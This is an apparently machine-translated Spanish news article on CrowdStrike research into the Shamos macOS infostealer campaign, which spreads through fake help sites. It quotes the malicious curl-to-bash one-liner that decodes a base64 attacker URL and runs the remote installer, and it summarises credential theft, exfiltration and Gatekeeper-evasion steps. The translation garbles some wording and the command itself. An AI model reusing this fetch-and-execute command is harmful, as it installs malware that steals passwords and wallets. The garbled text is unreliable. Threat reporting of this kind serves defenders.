Ha surgido una sofisticada campaña de malware dirigida a los usuarios de MacOS entre junio y agosto de 2025, intentando con éxito comprometer más de 300 entornos de clientes a través de sitios web de ayuda engañosa.
La operación maliciosa despliega Shamos, una variante del notorio robador de macos atómicos (AMOS), desarrollado por la Spider del Grupo CyberCriminal que opera este robador de información como malware como servicio para alquilar a otros ciberdelincuentes.
El ataque comienza cuando los usuarios desprevenidos buscan soluciones comunes de resolución de problemas de macOS, como el “caché de resolución de lavado de macOS”, solo para encontrar sitios web de malvertición promocionada en sus resultados de búsqueda.
Estos sitios fraudulentos, incluidos Mac-Safer.com y Rescue-Mac.com, se disfrazan de recursos legítimos de soporte técnico mientras albergan intenciones maliciosas.
La campaña ha dirigido a los usuarios en varios países, incluidos Estados Unidos, Reino Unido, Japón, China, Colombia, Canadá, México e Italia, excluyendo especialmente a Rusia debido a restricciones dentro de los foros de Ecrimime rusos que prohíben dirigirse a la Comunidad de las Regiones de los Estados Independientes.
Investigadores de crowdstrike identificado que los actores de amenaza explotan un enfoque sofisticado de ingeniería social al presentar a las víctimas instrucciones aparentemente útiles para resolver sus problemas técnicos.
Sin embargo, estas instrucciones contienen un engaño crítico: las víctimas tienen instrucciones de ejecutar un comando de terminal de una línea maliciosa que inicia el proceso de instalación de malware.
Resultados del motor de búsqueda con el sitio web promocionado de malvertimiento (fuente – crowdstrike)
Los investigadores señalaron que un perfil de publicidad de Google que promueve estos sitios web falsificados parece hacerse pasar por una tienda de electrónica legítima con sede en Australia, lo que sugiere técnicas de falsificación de identidad avanzada.
Perfil publicitario de Google (fuente – Crowdstrike)
Mecanismo de infección e implementación técnica
El mecanismo de infección del malware se basa en un comando terminal inteligentemente disfrazado que las víctimas ejecutan sin saberlo:-
“curl -fssl” $ (“echo” “ahr0chm6ly9py2xvdwrzzxj2zxjzlmnvbs9nbs9pbnn0ywxslnno” | “base64 -d”) | “intento”
Este comando realiza varias operaciones críticas en secuencia. Primero, decodifica la cadena codificada Base64 para revelar la URL https://iclouddservers.com/gm/install(.)sh, luego descarga y ejecuta un script bash de este servidor malicioso.
El script captura la contraseña del usuario y posteriormente descarga el ejecutable Shamos Mach-O desde https://iclouddservers.com/gm/update.
Una vez instalado en el directorio / TMP /, Shamos emplea técnicas de evasión múltiple para evitar la detección.
El malware elimina los atributos de archivo extendidos utilizando los comandos XATTR para evitar las verificaciones de seguridad de MacOS Gatekeeper, asigna permisos ejecutables a través de CHMOD y realiza verificaciones de máquina anti-virtuales para garantizar que no funcione dentro de un entorno de caja de arena de seguridad.
Luego, el robador ejecuta varios comandos AppleScript para un reconocimiento integral del host y la recopilación de datos.
Shamos se dirige específicamente a los archivos de billetera de criptomonedas, bases de datos de credenciales confidenciales, datos de llavero, contenido de aplenotes e información almacenada en el navegador.
Los paquetes de malware robaron datos en un archivo zip llamado “out.zip” y los exfiltran utilizando comandos CURL para servidores remotos.
Además, Shamos establece la persistencia a través de un archivo PLIST llamado com (.) Finder (.) Helper (.) Plist guardado en el directorio de lanzamiento del usuario cuando los privilegios de sudo están disponibles.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
